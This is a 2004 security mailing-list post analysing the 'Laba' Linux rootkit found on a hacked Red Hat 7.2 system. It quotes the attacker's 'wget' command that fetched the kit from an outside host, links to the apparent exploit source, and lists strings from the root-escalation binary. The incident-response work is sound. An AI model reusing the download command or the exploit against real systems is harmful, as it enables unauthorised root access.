[DShield] Laba Rootkit

Brian Coyle brian at linuxwidows.com
Wed Feb 4 04:17:39 GMT 2004


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue Feb 3 15:47:06 UTC 2004, Kevin Old wrote:

> I had a system hacked last night running a custom version of RH 7.2.
[snip]
> With that said I can't seem to find any info on the Laba rootkit.


Based on a quick analysis of the binary Kevin provided offlist, I believe
this is the source code of the exploit-

   http://www.opennet.ru/base/linux/1074188290_1755.txt.html

Note the matches with the strings output below (especially the mispelling
of 'cought').

The bash_history Kevin provided shows the binary was obtained with-

   wget rainfire.go.ro/laba.tgz

That file is still available and is identical to the one Kevin sent.

brian at honeypot:~/laba$ ls -l laba*.tgz
- -rw-r--r--    1 brian    brian        9142 Feb  3 21:14 laba-orig.tgz
- -rw-r--r--    1 brian    brian        9142 Feb  2 12:13 laba.tgz
brian at honeypot:~/laba$ cmp laba.tgz laba-orig.tgz


There were other files that Kevin needs to investigate, but I think
'laba' has been identified.  ;)



brian at honeypot:~/laba$ strings laba | more
{judicious snipping}

[+] PID %d GOT UID 0, enjoy!
bash
/bin/bash
burp
[!] parent check race...
SUCCESS, cought SLAB page!
FAILED!
/proc/slabinfo
fopen

read slabinfo

[+] Please wait...HEAVY SYSTEM LOAD!
        %u of %u [ %u %%  ETA %6.1f s ]
[+] overflow done, the moment of truth...



- --
"We choose to go to the moon, and do the other things...
 Not because they are easy, but because they are hard." -JFK
"We choose to explore space because doing so improves our
 lives and lifts our national spirit." -GWB 2004-01-14
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)
Comment: Brian Coyle, GCIA                http://www.giac.org/GCIA.php

iD8DBQFAIHJjER3MuHUncBsRAvbNAJ9gIuJw142nmvHQBz26NM0wfAFvwACfZCA2
Gkx1MuXbpFfrk3ekhpriwfE=
=0nh5
-----END PGP SIGNATURE-----




More information about the list mailing list